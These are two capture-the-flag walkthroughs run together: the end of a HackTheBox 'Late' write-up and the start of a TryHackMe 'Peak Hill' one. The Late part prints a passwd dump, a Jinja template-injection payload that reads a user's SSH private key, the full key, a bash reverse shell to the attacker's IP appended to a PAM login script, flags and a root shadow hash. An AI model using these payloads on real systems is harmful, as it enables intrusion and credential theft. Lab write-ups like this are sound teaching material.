<p>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash rtkit:x:111:114:RealtimeKit,,,:/proc:/usr/sbin/nologin usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin avahi:x:113:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin cups-pk-helper:x:114:117:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin saned:x:115:119::/var/lib/saned:/usr/sbin/nologin colord:x:116:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin pulse:x:117:121:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin geoclue:x:118:123::/var/lib/geoclue:/usr/sbin/nologin smmta:x:119:124:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin smmsp:x:120:125:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin </p> ``` Now we can read the SSH private key of ```svc_acc``` user using: ```python {{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read() }} ``` ![idrsa.png](images/idrsa.png) And we get the SSH private key of ```svc_acc```: ```console <p>-----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi /mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7 d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7 7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0 ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7 t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq 0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y 3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+ Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0 kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw== -----END RSA PRIVATE KEY----- </p> ``` Let's use the SSH private key: ```console ┌─[evyatar@parrot]─[/hackthebox/Late] └──╼ $ ssh -i svc_private_key [email protected] load pubkey "id_svc": invalid format The authenticity of host 'late.htb (10.10.11.156)' can't be established. ECDSA key fingerprint is SHA256:bFNeiz1CrOE5/p6XvXGfPju6CF1h3+2nsk32t8V1Yfw. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'late.htb,10.10.11.156' (ECDSA) to the list of known hosts. svc_acc@late:~$ whoami svc_acc svc_acc@late:~$ cat user.txt 2cdf38783b19ca4923a32186dfe3c1e1 svc_acc@late:~$ ``` And we get the user flag ```2cdf38783b19ca4923a32186dfe3c1e1```. ### Root By observing we can see that we control the script ```/usr/local/sbin/ssh-alert.sh``` which contains: ```bash #!/bin/bash RECIPIENT="[email protected]" SUBJECT="Email from Server Login: SSH Alert" BODY=" A SSH login was detected. User: $PAM_USER User IP Host: $PAM_RHOST Service: $PAM_SERVICE TTY: $PAM_TTY Date: `date` Server: `uname -a` " if [ ${PAM_TYPE} = "open_session" ]; then echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT} fi ``` Because we have write permission to this file, Let's add our reverse shell: ```console svc_acc@late:/usr/local/sbin$ echo "bash -i >& /dev/tcp/10.10.14.14/1234 0>&1" >> ssh-alert.sh ``` According to the script, we need to open an SSH to make this script run. By opening another SSH we get a reverse shell: ```console ┌─[evyatar@parrot]─[/hackthebox/Late] └──╼ $ c -lvp 1234 listening on [any] 1234 ... connect to [10.10.14.14] from late.htb [10.10.11.156] 41502 bash: cannot set terminal process group (1975): Inappropriate ioctl for device bash: no job control in this shell root@late:/# whoami && hostname whoami && hostnamec root late root@late:/# cat /root/root.txt cat /root/root.txt 194ed2fb80aff6e1934097ebe22eac56 root@late:/# ``` And we get the root flag ```194ed2fb80aff6e1934097ebe22eac56```. NOTE: We can find this script on ```/etc/pam.d/sshd```: ```console svc_acc@late:/etc/pam.d$ cat sshd # PAM configuration for the Secure Shell service # Standard Un*x authentication. @include common-auth # Disallow non-root logins when /etc/nologin exists. account required pam_nologin.so # Uncomment and edit /etc/security/access.conf if you need to set complex # access limits that are hard to express in sshd_config. # account required pam_access.so # Standard Un*x authorization. @include common-account # SELinux needs to be the first session rule. This ensures that any # lingering context has been cleared. Without this it is possible that a # module could execute code in the wrong domain. session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close # Set the loginuid process attribute. session required pam_loginuid.so # Create a new session keyring. session optional pam_keyinit.so force revoke # Standard Un*x session setup and teardown. @include common-session # Print the message of the day upon successful login. # This includes a dynamically generated part from /run/motd.dynamic # and a static (admin-editable) part from /etc/motd. #session optional pam_motd.so motd=/run/motd.dynamic session optional pam_motd.so noupdate # Print the status of the user's mailbox upon successful login. session optional pam_mail.so standard noenv # [1] # Set up user limits from /etc/security/limits.conf. session required pam_limits.so # Read environment variables from /etc/environment and # /etc/security/pam_env.conf. session required pam_env.so # [1] # In Debian 4.0 (etch), locale-related environment variables were moved to # /etc/default/locale, so read that as well. session required pam_env.so user_readenv=1 envfile=/etc/default/locale # SELinux needs to intervene at login time to ensure that the process starts # in the proper default security context. Only sessions which are intended # to run in the user's context should be run after this. session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open # Standard Un*x password updating. @include common-password # Execute a custom script session required pam_exec.so /usr/local/sbin/ssh-alert.sh ``` PDF password ```console root@late:/# cat /etc/shadow | grep root | cut -d':' -f2 cat /etc/shadow | grep root | cut -d':' -f2 $6$a6J2kmTW$cHVk8PYFcAiRyUOA38Cs1Eatrz48yp395Cmi7Fxszl/aqQooB.6qFmhMG1LYuHJpGvvaE1cxubWIdIc1znRJi. ```
# Peak Hill Exercises in Python library abuse and some exploitation techniques [Peak Hill](https://tryhackme.com/room/peakhill) ## Topic's - Network Enumeration - FTP Enumeration - Cryptography - Binary - Python Scripting (Decoder) - Reverse Enginierung - Misconfigured Binaries ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Task 1 Peak Hill Deploy and compromise the machine! Make sure you're connected to TryHackMe's network. ``` kali@kali:~/CTFs/tryhackme/Peak Hill$ sudo nmap -p- -Pn -sS -sC -sV -O 10.10.13.125 [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 17:02 CEST Nmap scan report for 10.10.13.125 Host is up (0.040s latency). Not shown: 65531 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 ftp ftp 17 May 15 18:37 test.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.8.106.222 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 04:d5:75:9d:c1:40:51:37:73:4c:42:30:38:b8:d6:df (RSA) | 256 7f:95:1a:d7:59:2f:19:06:ea:c1:55:ec:58:35:0c:05 (ECDSA) |_ 256 a5:15:36:92:1c:aa:59:9b:8a:d8:ea:13:c9:c0:ff:b6 (ED25519) 7321/tcp open swx? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: | Username: Password: | NULL: |_ Username: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port7321-TCP:V=7.80%I=7%D=10/8%Time=5F7F2AE0%P=x86_64-pc-linux-gnu%r(NU SF:LL,A,"Username:\x20")%r(GenericLines,14,"Username:\x20Password:\x20")%r SF:(GetRequest,14,"Username:\x20Password:\x20")%r(HTTPOptions,14,"Username SF::\x20Password:\x20")%r(RTSPRequest,14,"Username:\x20Password:\x20")%r(R SF:PCCheck,14,"Username:\x20Password:\x20")%r(DNSVersionBindReqTCP,14,"Use SF:rname:\x20Password:\x20")%r(DNSStatusRequestTCP,14,"Username:\x20Passwo SF:rd:\x20")%r(Help,14,"Username:\x20Password:\x20")%r(SSLSessionReq,14,"U SF:sername:\x20Password:\x20")%r(TerminalServerCookie,14,"Username:\x20Pas SF:sword:\x20")%r(TLSSessionReq,14,"Username:\x20Password:\x20")%r(Kerbero SF:s,14,"Username:\x20Password:\x20")%r(SMBProgNeg,14,"Username:\x20Passwo SF:rd:\x20")%r(X11Probe,14,"Username:\x20Password:\x20")%r(FourOhFourReque SF:st,14,"Username:\x20Password:\x20")%r(LPDString,14,"Username:\x20Passwo SF:rd:\x20")%r(LDAPSearchReq,14,"Username:\x20Password:\x20")%r(LDAPBindRe SF:q,14,"Username:\x20Password:\x20")%r(SIPOptions,14,"Username:\x20Passwo SF:rd:\x20")%r(LANDesk-RC,14,"Username:\x20Password:\x20")%r(TerminalServe SF:r,14,"Username:\x20Password:\x20")%r(NCP,14,"Username:\x20Password:\x20 SF:")%r(NotesRPC,14,"Username:\x20Password:\x20")%r(JavaRMI,14,"Username:\ SF:x20Password:\x20")%r(WMSRequest,14,"Username:\x20Password:\x20")%r(orac SF:le-tns,14,"Username:\x20Password:\x20")%r(ms-sql-s,14,"Username:\x20Pas SF:sword:\x20")%r(afp,14,"Username:\x20Password:\x20")%r(giop,14,"Username SF::\x20Password:\x20"); Device type: general purpose|specialized|storage-misc|WAP|printer Running (JUST GUESSING): Linux 3.X|4.X|2.6.X|2.4.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%) OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:2.4 Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 3.10 - 4.11 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Crestron XPanel control system (89%), Linux 3.12 (89%), Linux 3.2 - 3.5 (89%) No exact OS matches for host (test conditions non-ideal). Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 353.06 seconds ``` ``` kali@kali:~/CTFs/tryhackme/Peak Hill$ ftp 10.10.13.125 Connected to 10.10.13.125. 220 (vsFTPd 3.0.3) Name (10.10.13.125:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 May 15 18:37 . drwxr-xr-x 2 ftp ftp 4096 May 15 18:37 .. -rw-r--r-- 1 ftp ftp 7048 May 15 18:37 .creds -rw-r--r-- 1 ftp ftp 17 May 15 18:37 test.txt 226 Directory send OK. ftp> ``` - [](<https://gchq.github.io/CyberChef/#recipe=From_Binary('Space')&input=MTAwMDAwMDAwMDAwMDAxMTAxMDExMTAxMDExMTAwMDEwMDAwMDAwMDAwMTAxMDAwMDEwMTEwMDAwMDAwMTAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMDAwMTAwMTEwMTAxMDExMTAwMDEwMDAwMDAwMTAxMDExMDAwMDAwMDAwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDEwMTAxMTEwMDAxMDAwMDAwMTAxMDAwMDExMDAxMTEwMDAxMDAwMDAwMTEwMTAxMTAwMDAwMDAxMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDEwMTAxMTEwMDExMDExMDAxMDEwMTExMDAxMDAwMTEwMDAxMDExMTAwMDEwMDAwMDEwMDAxMDExMDAwMDAwMDAwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTEwMTAwMDAxMTEwMDAxMDAwMDAxMDExMDAwMDExMDAxMTEwMDAxMDAwMDAxMTAwMTAxMTAwMDAwMDAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDAwMDAxMTAwMDAxMDExMTAwMTEwMTExMDAxMTAwMTEwMDEwMDAxMTAxMDEwMTExMDAwMTAwMDAwMTExMDEwMTEwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDEwMDExMTAwMDEwMDAwMTAwMDEwMDAwMTEwMDExMTAwMDEwMDAwMTAwMTAxMDExMDAwMDAwMDEwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTAwMTAwMDExMDAwMDAxMTEwMDAxMDAwMDEwMTAwMTEwMTAwMDAwMDAwMTAxMTAwMDAxMTAwMTExMDAwMTAwMDAxMDExMDEwMTEwMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMDExMTAxMTEwMDAxMDAwMDExMDAwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDEwMTExMTEwMTExMDAwMTAwMDAxMTAxMTAwMDAxMTAwMTExMDAwMTAwMDAxMTEwMDEwMTEwMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAxMDEwMTExMDAxMTAxMTAwMTAxMDExMTAwMTAwMDExMDAwMDAxMTEwMDAxMDAwMDExMTEwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMDAxMTEwMTExMDAwMTAwMDEwMDAwMTAwMDAxMTAwMTExMDAwMTAwMDEwMDAxMDEwMTEwMDAwMDAwMTAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMDAxMDAwMTEwMTEwMDExMTAwMDEwMDAxMDAxMDAxMDExMDAwMDAwMDAwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTEwMTEwMDAxMTEwMDAxMDAwMTAwMTExMDAwMDExMDAxMTEwMDAxMDAwMTAxMDAwMTAxMTAwMDAwMDAxMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDAwMDAxMTAwMDAxMDExMTAwMTEwMTExMDAxMTAwMTEwMTAxMDExMTAwMDEwMDAxMDEwMTAxMDExMDAwMDAwMDAwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMDAxMTAxMTEwMDAxMDAwMTAxMTAxMDAwMDExMDAxMTEwMDAxMDAwMTAxMTEwMTAxMTAwMDAwMDAxMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDAwMDAxMTAwMDAxMDExMTAwMTEwMTExMDAxMTAwMTEwMDAxMDExMTAwMDEwMDAxMTAwMDAxMDExMDAwMDAwMDAwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMDAwMTAxMTEwMDAxMDAwMTEwMDExMDAwMDExMDAxMTEwMDAxMDAwMTEwMTAwMTAxMTAwMDAwMDAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDAwMDAxMTAwMDAxMDExMTAwMTEwMTExMDAxMTAwMTEwMDEwMDAxMTAwMTAwMTExMDAwMTAwMDExMDExMDExMDEwMDAwMDAwMTEwMTEwMDAwMTEwMDExMTAwMDEwMDAxMTEwMDAxMDExMDAwMDAwMDEwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTAwMDEwMDExMDAxMDAxMTEwMDAxMDAwMTExMDEwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDEwMDAwMDAwMTExMDAwMTAwMDExMTEwMTAwMDAxMTAwMTExMDAwMTAwMDExMTExMDEwMTEwMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAxMDEwMTExMDAxMTAxMTAwMTAxMDExMTAwMTAwMDExMDAxMDAxMTEwMDAxMDAxMDAwMDAwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMDAxMDEwMTExMDAwMTAwMTAwMDAxMTAwMDAxMTAwMTExMDAwMTAwMTAwMDEwMDEwMTEwMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAxMDEwMTExMDAxMTAxMTAwMTAxMDExMTAwMTAwMDExMDEwMTAxMTEwMDAxMDAxMDAwMTEwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMDEwMDEwMTExMDAwMTAwMTAwMTAwMTAwMDAxMTAwMTExMDAwMTAwMTAwMTAxMDEwMTEwMDAwMDAwMTAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMDAwMTAwMTExMDAwMDExMTAwMDEwMDEwMDExMDAxMTAxMDAwMDAwMDExMDExMDAwMDExMDAxMTEwMDAxMDAxMDAxMTEwMTAxMTAwMDAwMDAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDAwMDAxMTAwMDAxMDExMTAwMTEwMTExMDAxMTAwMTEwMDEwMDAxMTAxMTEwMTExMDAwMTAwMTAxMDAwMDEwMTEwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTAwMTAwMDExMTAwMDEwMDEwMTAwMTEwMDAwMTEwMDExMTAwMDEwMDEwMTAxMDAxMDExMDAwMDAwMDEwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTAwMTEwMTExMDAwMTAwMTAxMDExMDEwMTEwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTAxMDExMDExMTAwMDEwMDEwMTEwMDEwMDAwMTEwMDExMTAwMDEwMDEwMTEwMTAxMDExMDAwMDAwMDEwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTAwMDEwMDExMTAwMTAxMTEwMDAxMDAxMDExMTAwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAxMDAwMTExMDAwMTAwMTAxMTExMTAwMDAxMTAwMTExMDAwMTAwMTEwMDAwMDEwMTEwMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMDExMDAxMTEwMDAxMDAxMTAwMDEwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAwMTAwMTEwMDEwMTAwMDAxMTAwMTExMDAwMTAwMTEwMDExMDEwMTEwMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMTAwMTAxMTEwMDAxMDAxMTAxMDAwMTEwMTAwMDAwMDExMDAxMTAwMDAxMTAwMTExMDAwMTAwMTEwMTAxMDEwMTEwMDAwMDAwMTAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMDAxMDAwMTEwMDExMDExMTAwMDEwMDExMDExMDAxMDExMDAwMDAwMDAwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDExMTAxMTEwMDAxMDAxMTAxMTExMDAwMDExMDAxMTEwMDAxMDAxMTEwMDAwMTAxMTAwMDAwMDAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDAwMDAxMTAwMDAxMDExMTAwMTEwMTExMDAxMTAwMTEwMDEwMDAxMTAwMDEwMTExMDAwMTAwMTExMDAxMDExMDEwMDAwMDAxMDExMDEwMDAwMTEwMDExMTAwMDEwMDExMTAxMDAxMDExMDAwMDAwMDEwMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTAxMDAwMTExMDAwMTAwMTExMDExMDExMDEwMDAwMDAxMDAxMTEwMDAwMTEwMDExMTAwMDEwMDExMTEwMDAxMDExMDAwMDAwMDEwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMTExMDAxMTAxMTEwMDExMDExMDEwMDAwMTAxMTExMTAxMTEwMDAwMDExMDAwMDEwMTExMDAxMTAxMTEwMDExMDAxMTAwMDEwMDExMDEwMDAxMTEwMDAxMDAxMTExMDEwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTAwMDAwMTExMDAwMTAwMTExMTEwMTAwMDAxMTAwMTExMDAwMTAwMTExMTExMDEwMTEwMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAxMDEwMTExMDAxMTAxMTAwMTAxMDExMTAwMTAwMDExMDExMDAxMTEwMDAxMDEwMDAwMDAwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMDExMTAwMTExMDAwMTAxMDAwMDAxMTAwMDAxMTAwMTExMDAwMTAxMDAwMDEwMDEwMTEwMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMDAxMDAxMTEwMDAxMDEwMDAwMTEwMTAxMTAwMDAwMDAwMDAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMDAwMTEwMTExMDAwMTAxMDAwMTAwMTAwMDAxMTAwMTExMDAwMTAxMDAwMTAxMDEwMTEwMDAwMDAwMTAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMTEwMTEwMTAwMDAxMDExMTExMDExMTAwMDAwMTEwMDAwMTAxMTEwMDExMDExMTAwMTEwMDExMDAwMTAwMTEwMDExMDExMTAwMDEwMTAwMDExMDAxMTAxMDAwMDAwMDEwMDAxMDAwMDExMDAxMTEwMDAxMDEwMDAxMTEwMTAxMTAwMDAwMDAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDExMTAwMTEwMTExMDAxMTAxMTAxMDAwMDEwMTExMTEwMTExMDAwMDAxMTAwMDAxMDExMTAwMTEwMTExMDAxMTAwMTEwMDAxMDAxMTAxMTAwMTEx